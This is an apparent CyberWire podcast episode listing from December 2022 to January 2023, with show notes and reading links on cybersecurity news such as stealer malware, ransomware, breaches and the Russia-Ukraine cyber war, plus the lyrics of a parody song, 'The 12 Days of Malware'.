    Stealer malware from Russia. [Research Saturday] Jan 07, 2023

    Marisa Atkinson, an analyst from Flashpoint, joins Dave to discuss a new blog post from Flashpoint’s research team about “RisePro” Stealer, malware from Russia, and Pay-Per-Install Malware “PrivateLoader.” “RisePro” is written in C++ and appears to possess similar functionality to the stealer malware “Vidar.” It is a newly identified stealer that began appearing as the listed source of credential logs on the illicit log shop Russian Market on December 13, 2022.

    The research states, "Samples that Flashpoint analysts identified indicate that RisePro may have been dropped or downloaded by the pay-per-install malware downloader service “PrivateLoader” in the past year." Analysts identified several sets of logs uploaded to the illicit underground Russian Market, which listed their source as “RisePro.”

    The research can be found here:

    • “RisePro” Stealer and Pay-Per-Install Malware “PrivateLoader”

    CISA releases three ICS Advisories. Squealing cars. Rotate your secrets. Russian cyberespionage updates. Jan 06, 2023

    Security vulnerabilities in automobiles. CircleCI customers should "rotate their secrets." CISA Director Easterly notes Russian failures, but warns that shields should stay up. Attempted cyberespionage against US National Laboratories. Turla effectively recycles some commodity malware infrastructure. Robert M. Lee from Dragos shares his outlook on ICS for the new year. Our CyberWire Space correspondent Maria Varmazis interviews Diane Janosek from NSA about her research on space-cyber. And the Guardian continues to recover from last month's ransomware attack.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/4


    Selected reading.

    Hitachi Energy UNEM (CISA)

    Hitachi Energy FOXMAN-UN (CISA)

    Hitachi Energy Lumada Asset Performance Management (CISA)

    Web Hackers vs. The Auto Industry: Critical Vulnerabilities in Ferrari, BMW, Rolls Royce, Porsche, and More (Sam Curry)

    Toyota, Mercedes, BMW API flaws exposed owners’ personal info (BleepingComputer)

    16 Car Makers and Their Vehicles Hacked via Telematics, APIs, Infrastructure (SecurityWeek)

    Ferrari, BMW, Rolls Royce, Porsche and more fix vulnerabilities giving car takeover capabilities (The Record by Recorded Future)

    CircleCI security alert: Rotate any secrets stored in CircleCI (CircleCI)

    CircleCI warns of security breach — rotate your secrets! (BleepingComputer)

    CircleCI Urges Customers to Rotate Secrets Following Security Incident (The Hacker News)

    CISA director: US needs to be vigilant, ‘keep our shields up’ against Russia (The Hill)

    Exclusive-Russian Hackers Targeted U.S. Nuclear Scientists (Reuters via US News)

    Notorious Russian Spies Piggybacked on Other Hackers' USB Infections (WIRED)

    Turla: A Galaxy of Opportunity | Mandiant (Mandiant)

    Fallout from Guardian cyber attack to last at least a month (ComputerWeekly)

    State of Ransomware Preparedness (Axio)


    PurpleUrchin’s freejacking. Bluebottle versus the banks. A supply-chain attack on a machine-learning framework. The ransomware leaderboard. And cyber ops in a hybrid war. Jan 05, 2023

    The PurpleUrchin freejacking campaign. Bluebottle activity against banks in Francophone Africa. The PyTorch framework sustains a supply-chain attack. 2022's ransomware leaderboard. Cellphone traffic as a source of combat information. FBI Cyber Division AD Bryan Vorndran on the interaction and collaboration of federal agencies in the cyber realm. Our guest Jerry Caponera from ThreatConnect wonders if we need more "Carrots" Than "Sticks" In Cybersecurity Regulation. And two incommensurable views of information security.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/3


    Selected reading.

    An analysis of the PurpleUrchin campaign. (CyberWire)

    PurpleUrchin Bypasses CAPTCHA and Steals Cloud Platform Resources (Unit 42)

    Bluebottle observed in the wild. (CyberWire)

    Bluebottle: Campaign Hits Banks in French-speaking Countries in Africa (Symantec)

    PyTorch incident disclosed, assessed. (CyberWire)

    PyTorch dependency poisoned with malicious code (Register)

    Compromised PyTorch-nightly dependency chain between December 25th and December 30th, 2022. (PyTorch)

    Most active, impactful ransomware groups of 2022. (CyberWire)

    2022 Year in Review: Ransomware (Trustwave)

    Russia says phone use allowed Ukraine to target its troops (AP NEWS)

    For Russian Troops, Cellphone Use Is a Persistent, Lethal Danger (New York Times)

    Kremlin blames own soldiers for Himars barracks strike as official death toll rises (The Telegraph)

    No Water’s Edge: Russia’s Information War and Regime Security (Carnegie Endowment for International Peace)


    Terms of service and GDPR. LastPass breach update. GhostWriter resurfaces in action against Poland and its neighbors. Cellphones, opsec, and rocket strikes. Jan 04, 2023

    Ad practices draw a large EU fine (and may set precedents for online advertising). Updates on the LastPass breach, and on Russian cyber activity against Poland. Malek Ben Salem from Accenture explains smart deepfakes. Our guest is Leslie Wiggins, Program Director for Data Security at IBM Security on the role of the security specialist. And cellphones, opsec, and the Makiivka strike.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/2


    Selected reading.

    Meta’s Ad Practices Ruled Illegal Under E.U. Law (New York Times)

    Meta Fined More Than $400 Million in EU for Serving Ads Based on Online Activity (Wall Street Journal)

    Meta's New Year kicks off with $410M+ in fresh EU privacy fines (TechCrunch)

    LastPass data breach: notes and actions to take. (CyberWire)

    Poland warns of attacks by Russia-linked Ghostwriter hacking group (BleepingComputer)

    Russia says phone use allowed Ukraine to target its troops (AP NEWS)

    Russian soldier gave away his position with geotagged social media posts (Task & Purpose)

    Russian commanders blamed for heavy losses in New Year’s Day strike (Washington Post)


    DPRK cyber ops. Poland warns of Russian cyber activity. Twitter’s data incident. A crypto trading exchange is rifled. Ransomware shuts down the Port of Lisbon. Small business opportunities. Jan 03, 2023

    Recent DPRK cyber operations: spying and theft. Twitter’s data incident. 3Commas breached. Poland warns of increased Russian offensive cyber activity. Port of Lisbon hit by ransomware. DHS announces SBIR topics. New additions to the Known Exploited Vulnerabilities Catalog. Ben Yelin on the legal conundrum of AI generated code. Our guest is Tanya Janca from She Hacks Purple with insights on API security. And, news flash! LockBit says they have a conscience. (Yeah, right.)


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/12/1


    Selected reading.

    Recent DPRK cyber operations: spying and theft. (CyberWire)

    Twitter targeted in extortion hack. (CyberWire)

    3Commas' API compromised. (CyberWire)

    Russian cyberattacks (Special Services)

    LockBit activity over the holidays. (CyberWire)

    CISA Adds Two Known Exploited Vulnerabilities to Catalog (CISA)

    DHS Small Business Innovation Research (SBIR) Program FY23 Solicitation (SAM.gov)

    The SBIR and STTR Programs. (SBIR/STTR)


    Software supply chain management: Lessons learned from SolarWinds. [CyberWire-X] Jan 03, 2023

    Between the emergence of sophisticated nation-state actors, the rise of ransomware-as-a-service, the increasing attack surface remote work presents, and much more, organizations today contend with more complex risk than ever. A “Secure-by-Design” approach can secure software environments, development processes and products. That approach includes increasing training for employees, adopting zero trust, leveraging Red Teams, and creating a unique triple-build software development process. SolarWinds calls its version of this process the "Next-Generation Build System," and offers it as a model for secure software development that will make supply chain attacks more difficult.

    On this episode of CyberWire-X, host Rick Howard, N2K’s CSO and CyberWire’s Chief Analyst and Senior Fellow, discusses software supply chain lessons learned from the SolarWinds attack of 2020 with Hash Table members Rick Doten, the CISO for Healthcare Enterprises and Centene, Steve Winterfeld, Akamai's Advisory CISO, and Dawn Cappelli, Director of OT-CERT at Dragos. In the second half of the show, Rick speaks with Tim Brown, CISO of our episode sponsor, SolarWinds.


    Women in Cybersecurity panel: A discussion on hidden figures of cyber skills gap. [Special Edition] Jan 02, 2023

    On Thursday October 20, 2022, the CyberWire was pleased to host the annual Women in Cybersecurity Reception at the International Spy Museum in Washington, DC. This annual event brought together almost 300 people to highlight and celebrate the value and successes of women in the cybersecurity industry. The reception included an industry-led panel discussion called “The Hidden Impact of Cybersecurity’s Talent Gap on the Cyber-Enabled Community,” discussing cyber-enabled professionals who aren’t usually included in conversations around the cybersecurity skills gap. The panel, moderated by Simone Petrella of CyberVista, included perspectives from experts including Davida Gray of MindPoint Group, Jennifer Walsmith of Northrop Grumman, Kyla Guru of Bits N’ Bytes, and Amy Mushahwar from Alston & Bird.


    Encore: LemonDucks evading detection. Dec 31, 2022

    Scott Fanning from CrowdStrike's research team joins Dave to discuss their work on "LemonDuck Targets Docker for Cryptomining Operations." LemonDuck is a well-known cryptomining botnet, and the research suggests attackers are attracted to the monetary gain from the recent boom in cryptocurrency.

    LemonDuck was caught trying to disguise its attack against Docker by running an anonymous mining operation through the use of proxy pools. Scott shares how it's unknown which organizations have been targeted and just how much cryptocurrency has been stolen.

    The research can be found here:

    • LemonDuck Targets Docker for Cryptomining Operations

    Interview Select: Nick Schneider of Arctic Wolf discusses why he believes 2023 will see a resurgence of ransomware and why the decline of crypto will not deter future ransomware actors. Dec 30, 2022

    SHOW NOTES

    This interview from October 28th, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with Nick Schneider of Arctic Wolf to discuss why he believes 2023 will see a resurgence of ransomware and why the decline of crypto will not deter future ransomware actors.


    Sisters, grifters, and shifters. [Hacking Humans Goes to the Movies] Dec 29, 2022

    Thanks for joining us again for another episode of a fun project brought to you by the team of Hacking Humans, the CyberWire's social engineering podcast. Hacking Humans co-host Dave Bittner is joined by Rick Howard in this series where they view clips from their favorite movies and television shows with examples of the social engineering scams and schemes you hear Dave and co-host Joe Carrigan talk about on Hacking Humans. In this episode, Dave and Rick watch each of the selected scenes, describe the on-screen action for you, and then deconstruct what they saw. Grab your bowl of popcorn and join us for some fantastic scams and frauds.

    On this episode, Dave and Rick are joined by guest contributor Amanda Fennell. You can find Amanda on Twitter at @Chi_from_afar.

    Links to this episode's clips if you'd like to watch along:

    • Dave's clip from the movie Zombieland
    • Rick's clip from the movie Traveller
    • Amanda's clip from the movie The Girl with the Dragon Tattoo

    Interview Select: Diana Kelley, CSO & Co-founder of Cybrize to discuss the need for innovation and entrepreneurship in cybersecurity. Dec 28, 2022

    This interview from September 16th, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with Diana Kelley, CSO & Co-founder of Cybrize to discuss the need for innovation and entrepreneurship in cybersecurity.


    Interview Select: MK Palmore from Google Cloud talks about why collective cybersecurity ultimately depends on having a diverse, skilled workforce. Dec 27, 2022

    This interview from September 30th, 2022 originally aired as a shortened version on the CyberWire Daily Podcast. In this extended interview, Dave Bittner sits down with MK Palmore from Google Cloud to talk about why collective cybersecurity ultimately depends on having a diverse, skilled workforce.


    Research Briefing: Spearphishing against Japanese political entities. Trojanized Windows 10 installers target Ukraine. XLL files abused to deliver malware. Dec 26, 2022

    Spearphishing against Japanese political entities. Trojanized Windows 10 installers target Ukraine. XLL files abused to deliver malware.


    The CyberWire: The 12 Days of Malware. [Special Editions] Dec 25, 2022

    Merry Christmas and Happy Holidays from the CyberWire and our friends! Enjoy our rendition of the 12 Days of Malware created by Dave Bittner and performed by Dave and friends: Rachel Tobac, Jayson Street, Ron Eddings & Chris Cochran, Ray [Redacted], Dinah Davis, Camille Stewart, Rick Howard, Michelle Dennedy, Jack Rhysider, Johannes Ullrich, and Charity Wright. Ba dum bum bum. Sing along if you are game! Check out our video for the full effect!


    The 12 Days of Malware lyrics

    On the first day of Christmas, my malware gave to me:

    A keylogger logging my keys.


    On the second day of Christmas, my malware gave to me:

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the third day of Christmas, my malware gave to me:

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the fourth day of Christmas, my malware gave to me:

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the fifth day of Christmas, my malware gave to me:

    5 Zero Days!

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the sixth day of Christmas, my malware gave to me:

    6 Passwords spraying...

    5 Zero Days!

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the seventh day of Christmas, my malware gave to me:

    7 Scripts a scraping...

    6 Passwords spraying...

    5 Zero Days!

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the eighth day of Christmas, my malware gave to me:

    8 Worms a wiping...

    7 Scripts a scraping...

    6 Passwords spraying...

    5 Zero Days!

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the ninth day of Christmas, my malware gave to me:

    9 Rootkits rooting...

    8 Worms a wiping...

    7 Scripts a scraping...

    6 Passwords spraying...

    5 Zero Days!

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the tenth day of Christmas, my malware gave to me:

    10 Darknet markets...

    9 Rootkits rooting...

    8 Worms a wiping...

    7 Scripts a scraping...

    6 Passwords spraying...

    5 Zero Days! (Bah-dum-dum-dum!)

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the eleventh day of Christmas, my malware gave to me:

    11 Phishers phishing...

    10 Darknet markets...

    9 Rootkits rooting...

    8 Worms a wiping...

    7 Scripts a scraping...

    6 Passwords spraying...

    5 Zero Days! (Bah-dum-dum-dum!)

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    On the twelfth day of Christmas, my malware gave to me:

    12 Hackers hacking...

    11 Phishers phishing...

    10 Darknet markets...

    9 Rootkits rooting...

    8 Worms a wiping...

    7 Scripts a scraping...

    6 Passwords spraying...

    5 Zero Days!

    4 Crypto scams...

    3 Web shells...

    2 Trojan Apps...

    And a keylogger logging my keys.


    Encore: Vulnerabilities in IoT devices. Dec 24, 2022

    Dr. May Wang, CTO of IoT Security at Palo Alto Networks, joins Dave Bittner to discuss their findings detailed in Unit 42's "Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization" research. Unit 42 recently set out to better understand how well hospitals and other healthcare providers are doing in securing smart infusion pumps, which are network-connected devices that deliver medications and fluids to patients. This topic is of critical concern because security lapses in these devices have the potential to put lives at risk or expose sensitive patient data.

    Unit 42's discovery of security gaps in three out of four infusion pumps that they reviewed highlights the need for the healthcare industry to redouble efforts to protect against known vulnerabilities, while diligently following best practices for infusion pumps and hospital networks. May walks us through Unit 42's work.

    The research can be found here:

    • Know Your Infusion Pump Vulnerabilities and Secure Your Healthcare Organization

    PolyVice and Royal ransomware make nuisances of themselves. US warns that KillNet can be expected to go after the healthcare sector. CISA’s plans for stakeholder engagement. Dec 23, 2022

    The Vice Society may be upping its marketing game. Royal ransomware may have a connection to Conti. Royal delivers ransom note by hacked printer. KillNet goes after healthcare. CISA's Stakeholder Engagement Strategic Plan. Adam Meyers from CrowdStrike looks at cyber espionage. Giulia Porter from RoboKiller does not want to talk to you about your car’s extended warranty. And holiday wishes to all.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/245


    Selected reading.

    Custom-Branded Ransomware: The Vice Society Group and the Threat of Outsourced Development (SentinelOne)

    Vice Society ransomware gang switches to new custom encryptor (BleepingComputer)

    Conti Team One Splinter Group Resurfaces as Royal Ransomware with Callback Phishing Attacks (Trend Micro)

    Researchers Link Royal Ransomware to Conti Group (SecurityWeek)

    Major Australian university dealing with suspected cybersecurity attack (7NEWS)

    Printers at Queensland's second-largest university spit out ransomware messages after cyber attack (ABC)

    Pro-Russian Hacktivist Group ‘KillNet’ Threat to HPH Sector (HC3)

    HHS alert warns KillNet hacktivist group targeted US healthcare entity (SC Media)

    HC3 Analyst Note TLP Clear Pro-Russian Hacktivist Group Killnet Threat to HPH Sector December 22, 2022 | AHA (American Hospital Association)

    Strategic Plan for Stakeholder Engagement (CISA)


    Online fraud, some targeting shoppers and investors, others going after e-commerce retailers. Updates on the cyber phases of Russia’s hybrid war. Dec 22, 2022

    The FBI warns of malicious advertising. A new gang makes an unwelcome appearance in the holiday season. Ukraine will receive more Starlink terminals after all. Cyber phases of the hybrid war: a view from Kyiv–the bears and their adjuncts are opportunistic agents of chaos. Caleb Barlow thinks boards of directors need to up their cyber security game. Our guest is AJ Nash from ZeroFox with a look at legislative restrictions on TikTok. And reports say that US National Cyber Director Chris Inglis is preparing to retire. We wish him the best of luck.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/244


    Selected reading.

    Cyber Criminals Impersonating Brands Using Search Engine Advertisement Services to Defraud Users (FBI)

    A sophisticated fraud ring is waging war on commerce, using rapidly changing tactics (Signifyd)

    Ukraine to Get Thousands More Starlink Antennas, Minister Says (Bloomberg)

    Ukraine’s Cyber Units Aim to Retain Staff, Keep Services Stable as War Enters Year Two (Wall Street Journal)

    Top Biden cybersecurity adviser to step down (CNN)

Chris Inglis to resign as national cyber director (CyberScoop)

    First-ever national cyber director Chris Inglis set to retire in coming months: sources (Axios)

    White House cyber adviser to resign (The Hill)

    Chris Inglis, Biden's top cyber adviser, plans to leave government in coming months (POLITICO)

    White House Cyber Director Chris Inglis to Step Down (Bank Info Security)


    Developing a banking Trojan into a newer, more effective form. Cyberattacks on media outlets. Abuse of AWS Elastic IP transfer. Notes on the hybrid war. And cybercrooks are inspired by Breaking Bad. Dec 21, 2022

    The Godfather banking Trojan has deep roots in older code. FuboTV was disrupted around its World Cup coverage. The Guardian has been hit with an apparent ransomware attack. A threat actor abuses AWS Elastic IP transfer. Moldova may be receiving more Russian attention in cyberspace. CISA releases six industrial control system advisories. Ben Yelin looks at legislation addressing health care security. Our guest is Hugh Njemanze of Anomali with advice on preparing for the holiday break. And criminals are impersonating other criminals' underworld souks.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/243


    Selected reading.

    Godfather: A banking Trojan that is impossible to refuse (Group-IB)

    FuboTV outage during World Cup semifinal was caused by cyberattack (Record)

    Guardian hit by serious IT incident believed to be ransomware attack (the Guardian)

    Elastic IP Hijacking — A New Attack Vector in AWS (Mitiga)

    Telegram Hack Exposes Growing Russian Cyber Threat in Moldova (Balkan Insight)

    Fuji Electric Tellus Lite V-Simulator (CISA)

    Rockwell Automation GuardLogix and ControlLogix controllers (CISA)

    ARC Informatique PcVue (CISA)

    Rockwell Automation MicroLogix 1100 and 1400 (CISA)

    Delta 4G Router DX-3021 (CISA)

    Prosys OPC UA Simulation Server (CISA)

    The scammers who scam scammers on cybercrime forums: Part 3 (Sophos News)


    Warnings on SentinelSneak. The rise of malicious XLLs. Updates from Russia’s hybrid war. An unusually loathsome campaign targets children. Dec 20, 2022

    SentinelSneak is out in the wild. XLLs for malware delivery. CERT-UA warns of attacks against the DELTA situational awareness system. FSB cyber operations against Ukraine. Trends in the cyber phases of Russia's hybrid war. Mr. Security Answer Person John Pescatore offers his sage wisdom. Microsoft’s Ann Johnson from Afternoon Cyber Tea speaks with Dr. Chenxi Wang from Rain Capital. And an unusually unpleasant sextortion campaign.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/242


    Selected reading.

    SentinelSneak is not a legitimate SDK. (CyberWire)

    SentinelSneak: Malicious PyPI module poses as security software development kit (ReversingLabs)

    Malicious Python Trojan Impersonates SentinelOne Security Client (Dark Reading)

    Malicious ‘SentinelOne’ PyPI package steals data from developers (BleepingComputer)

    Cisco research on XLL Abuse. (CyberWire)

    Threat Spotlight: XLLing in Excel - threat actors using malicious add-ins (Cisco Talos Blog)

    Ukraine at D+299: Cyber operations 300 days into the war. (CyberWire)

    Cyber Dimensions of the Armed Conflict in Ukraine (CyberPeace Institute)

    Ukraine's DELTA military system users targeted by info-stealing malware (BleepingComputer)

    Ukraine's Delta Military Intel System Hit by Attacks (Infosecurity Magazine)

    Russia’s Trident Ursa (aka Gamaredon APT) Cyber Conflict Operations Unwavering Since Invasion of Ukraine (Unit 42)

    FBI and Partners Issue National Public Safety Alert on Financial Sextortion Schemes | Federal Bureau of Investigation (Federal Bureau of Investigation)

    HSI, federal partners issue national public safety alert on sextortion schemes (US Immigration and Customs Enforcement)


    BEC gets into bulk food theft. BlackCat ransomware update. Epic Games’ settlement with FTC. InfraGard data taken down. More on the hybrid war. And Twitter asks for the voice of the people. Dec 19, 2022

    BEC takes aim at physical goods (including food). BlackCat ransomware activity increases. Epic Games settles an FTC regulatory case. The InfraGard database was pulled from a dark web auction site. CISA releases forty-one ICS advisories. Rick Howard interviews author Andy Greenberg. Rob Boyce from Accenture examines holiday cyber threats. The growing value of open source intelligence. Twitter says vox populi, vox dei.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/241


    Selected reading.

    FBI, FDA OCI, and USDA Release Joint Cybersecurity Advisory Regarding Business Email Compromise Schemes Used to Steal Food (CISA)

    Colombian energy supplier EPM hit by BlackCat ransomware attack (BleepingComputer)

    Events D.C. data published online in apparent ransomware attack (Washington Post)

    Fortnite Video Game Maker Epic Games to Pay More Than Half a Billion Dollars over FTC Allegations of Privacy Violations and Unwanted Charges (Federal Trade Commission)

    Hacker Halts Sale of FBI's High-Profile InfraGard Database (HackRead)

    CISA Releases Forty-One Industrial Control Systems Advisories (Cybersecurity and Infrastructure Security Agency)

    Russia’s Wartime Cyber Operations in Ukraine: Military Impacts, Influences, and Implications (Carnegie Endowment for International Peace)

    How open-source intelligence has shaped the Russia-Ukraine war (GOV.UK)

    Front-line video makes Ukrainian combat some of history’s most watched (Washington Post)

    Elon Musk Polls Twitter Users, Asking Whether He Should Step Down (Wall Street Journal)

    Musk asks: Should I stay as CEO? (Computing)

    Elon Musk’s Twitter Poll Shows Users Want Him to Step Down (Wall Street Journal)

    Elon Musk’s Twitter poll: 10 million say he should step down (the Guardian)


    Strategies to get the most out of your toolsets. [CyberWire-X] Dec 18, 2022

With a recession looming, many business leaders are looking for ways to cut spending wherever possible. And while tool bloat affects many security teams, it can be a challenging problem to tackle for a couple of reasons. First, there’s the fear that security will be lost if a tool is removed. Second, there’s the daunting task of unraveling complex systems. And finally, there’s the perennial talent shortage. Like all challenges in security, they’re made even worse by the fact that there are not enough people able to tackle them.

    During this CyberWire-X episode, host Rick Howard, the CyberWire’s CISO, Chief Analyst and Senior Fellow, speaks with Hash Table member Ted Wagner, the CSO of SAP National Security Services, and host Dave Bittner speaks with sponsor ExtraHop Senior Technical Marketing Manager Jamie Moles. They discuss solutions to help business and security leaders to not just address these challenges, but to get more out of their tooling as they do. They discuss strategies for how to determine which tools you actually need and which you can get rid of, as well as the step-change benefits that can be realized when you consolidate, automate, and integrate your security solutions.


    Don Pezet: Stepping stones are the start of your career. [CTO] [Career Notes] Dec 18, 2022

    Don Pezet, CTO of ACI Learning, sits down to share his over 25 years of experience in the industry. Don previously spent time as a field engineer in the financial and insurance industries supporting networks around the world. He co-founded ITProTV in 2012 to help create the IT training that he wished he had when he got started in his IT career. He also shares insights for anyone else wishing to pursue IT, no matter their age or past experience. Don explains how important stepping stones are as you get into this field, stating "know that that first job you get is probably not going to be the job you want to have your whole life, but it's a stepping stone that leads to where you want to get." Don started teaching on the side as well as working in the IT field and explains how much his teaching skills come in handy to help him with his leadership skills, which in turn helps him to be a better CTO, helping his customers. We thank Don for sharing his story.


    Hijacking holiday spirit with phishing scams. [Research Saturday] Dec 17, 2022

Or Katz from Akamai sits down with Dave to discuss research on highly sophisticated phishing scams and how they abuse holiday sentiment. This particular threat has most recently focused on Halloween deals, enticing victims with the chance to win a free prize, including from Dick’s Sporting Goods or Tumi Backpacks. It then requests credit card details to cover the cost of shipment.

    From mid-September to the end of October 2022, Akamai's researchers were able to uncover and track this threat. The kit mimics well-known retail stores in the hope of hijacking credit card information, feeding off people's holiday spirit.

    The research can be found here:

    • Highly Sophisticated Phishing Scams Are Abusing Holiday Sentiment

    Malicious apps do more than extort predatory loans. A Facebook account recovery scam. Notes from the hybrid war. Goodbye SHA-1, hello Leviathans. Dec 16, 2022

    A predatory loan app is discovered embedded in mobile apps. Facebook phishing. GPS disruptions are reported in Russian cities. NSA warns against dismissing Russian offensive cyber capabilities. Farewell, SHA-1. Kevin Magee from Microsoft looks at cyber signals. Our guest is Jason Witty of USAA to discuss the growing risk from quantum computing. And welcome to the world, Leviathans.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/240


    Selected reading.

    Zimperium teams discover new malware in Flutter developed apps (SecurityBrief Asia)

    Meta-Phish: Facebook Infrastructure Used in Phishing Attack Chain (Trustwave)

    GPS Signals Are Being Disrupted in Russian Cities (WIRED)

    NSA cyber director warns of Russian digital assaults on global energy sector (CyberScoop)

    Russia's cyber war machine in Ukraine hasn't lived up to Western hype. Report analyses why (ThePrint)

    NIST Retires SHA-1 Cryptographic Algorithm (NIST)

    Historic activation of the U.S. Army’s 11th Cyber Battalion (DVIDS)


    Updates on the cyber phases of a hybrid war. Alleged booters busted. Progress report from the US anti-ransomware task force. Suspicion in AIIMS hack turns toward China. Dec 15, 2022

    Trojanized Windows 10 installers are deployed against Ukraine. Alleged booters have been collared, and their sites disabled. A progress report on US anti-ransomware efforts. Suspicion in a cyberattack against India turns toward China. Bryan Vorndran from the FBI’s Cyber Division talks about deep fakes. Our guest is Lisa Plaggemier from the National Cybersecurity Alliance (NCA) on the launch of their Historically Black Colleges and Universities Career Program. And hybrid war and fissures in the underworld.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/239


    Selected reading.

    Trojanized Windows 10 Operating System Installers Targeted Ukrainian Government (Mandiant)

    Federal Prosecutors in Los Angeles and Alaska Charge 6 Defendants with Operating Websites that Offered Computer Attack Services (US Department of Justice)

    Global crackdown against DDoS services shuts down most popular platforms | Europol (Europol)

    Readout of Second Joint Ransomware Task Force Meeting (Cybersecurity and Infrastructure Security Agency)

    US finds its ‘center of gravity’ in the fight against ransomware (The Record by Recorded Future)

    AIIMS cyber attack may have originated in China, Hong Kong (The Times of India)

    AIIMS Delhi Servers Were Hacked By Chinese, Damage Contained: Sources (NDTV.com)

    Russia-Ukraine war reaches dark side of the internet (Al Jazeera)


    InfraGard data for sale. Cyberespionage warnings. Data sharing practices. Malicious drivers with legitimate signatures. Patch Tuesday. Task Force KleptoCapture indicts five Russian nationals. Dec 14, 2022

    The FBI’s InfraGard user data shows up for sale. An update on Iranian cyber operations. NSA warns of Chinese cyber threats. Challenges in sharing data for threat detection and prevention. Legitimately signed drivers are used in targeted attacks. Patch Tuesday addressed a lot of actively exploited issues. Tim Starks from the Washington Post Cybersecurity 202 shares his reporting on ICS vulnerabilities. Our guest is Mike Fey from Island with an introduction to the enterprise browser space. And the US indicts five Russian nationals on sanctions-evasion charges.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/238


    Selected reading.

    FBI’s Vetted Info Sharing Network ‘InfraGard’ Hacked (KrebsOnSecurity)

    Would’ve, Could’ve, Should’ve…Did: TA453 Refuses to be Bound by Expectations (Proofpoint)

    APT5: Citrix ADC Threat Hunting Guidance (NSA)

    U.S. agency warns that hackers are going after Citrix networking gear (Reuters)

    NSA Outs Chinese Hackers Exploiting Citrix Zero-Day (SecurityWeek)

    Effect of data on Federal agencies' policies. (CyberWire)

    I Solemnly Swear My Driver Is Up to No Good: Hunting for Attestation Signed Malware (Mandiant)

    Driving Through Defenses | Targeted Attacks Leverage Signed Malicious Microsoft Drivers (SentinelOne)

    SAP Security Patch Day December 2022 (Onapsis)

    December 2022 Security Updates (Microsoft Security Response Center)

    December Patch Tuesday Updates | 2022 - Syxsense Inc (Syxsense Inc)

    Microsoft December 2022 Patch Tuesday fixes 2 zero-days, 49 flaws (BleepingComputer)

    Microsoft Squashes Zero-Day, Actively Exploited Bugs in Dec. Update (Dark Reading)

    Microsoft fixes exploited zero-day, revokes certificate used to sign malicious drivers (CVE-2022-44698) (Help Net Security)

    Microsoft Releases December 2022 Security Updates (CISA)

    Apple security updates (Apple Support)

    We finally know why Apple pushed out that emergency 16.1.2 update (Macworld)

    Why You Should Enable Apple’s New Security Feature in iOS 16.2 Right Now (Wirecutter)

    Apple Releases Security Updates for Multiple Products (CISA)

    Citrix ADC and Citrix Gateway Security Bulletin for CVE-2022-27518 (Citrix)

    State-sponsored attackers actively exploiting RCE in Citrix devices, patch ASAP! (CVE-2022-27518) (Help Net Security)

    Citrix Releases Security Updates for Citrix ADC, Citrix Gateway (CISA)

    VMware Patches VM Escape Flaw Exploited at Geekpwn Event (SecurityWeek)

    Experts detailed a previously undetected VMware ESXi backdoor (Security Affairs)

    VMware Releases Security Updates for Multiple products (CISA)

    Mozilla Releases Security Updates for Thunderbird and Firefox (CISA)

    Adobe Patches 38 Flaws in Enterprise Software Products (SecurityWeek)

    CISA Releases Three Industrial Control Systems Advisories (CISA)

    Five Russian Nationals, Including Suspected FSB Officer, and Two U.S. Nationals Charged with Helping the Russian Military and Intelligence Agencies Evade Sanctions (US Department of Justice)

    Russian Military and Intelligence Agencies Procurement Network Indicted in Brooklyn Federal Court (US Department of Justice)


    Uber’s breach. Phishing in Ukraine’s in-boxes. What’s Russia been up to anyway? (Not the same thing, probably, NATO would be up to.) And the ransomware leader board. Dec 13, 2022

    Uber sustains a third-party breach. A phishing campaign hits Ukrainian in-boxes. The enduring riddle of why Russian offensive cyber operations have failed in Ukraine. Joe Carrigan on credit card skimming. Carole Theriault describes a UK food store chain that uses facial recognition technology to track those with criminal or antisocial behavior. And 2023’s ransomware-as-a-service leader board.


    For links to all of today's stories check out our CyberWire daily news briefing:

    https://thecyberwire.com/newsletters/daily-briefing/11/237


    Selected reading.

    Uber suffers new data breach after attack on vendor, info leaked online (BleepingComputer)

    Uber has been hacked yet again with code and employee data released online (SiliconANGLE)

    Uber hit by new data breach — what you need to know (Tom's Guide)

    Uber’s data breach. (CyberWire)

    Ukrainian railway, state agencies allegedly targeted by DolphinCape malware (The Record by Recorded Future)

    Cyber Operations in Ukraine: Russia’s Unmet Expectations (Carnegie Endowment for International Peace)

    The most prolific ransomware groups of 2022 (Searchlight Security)


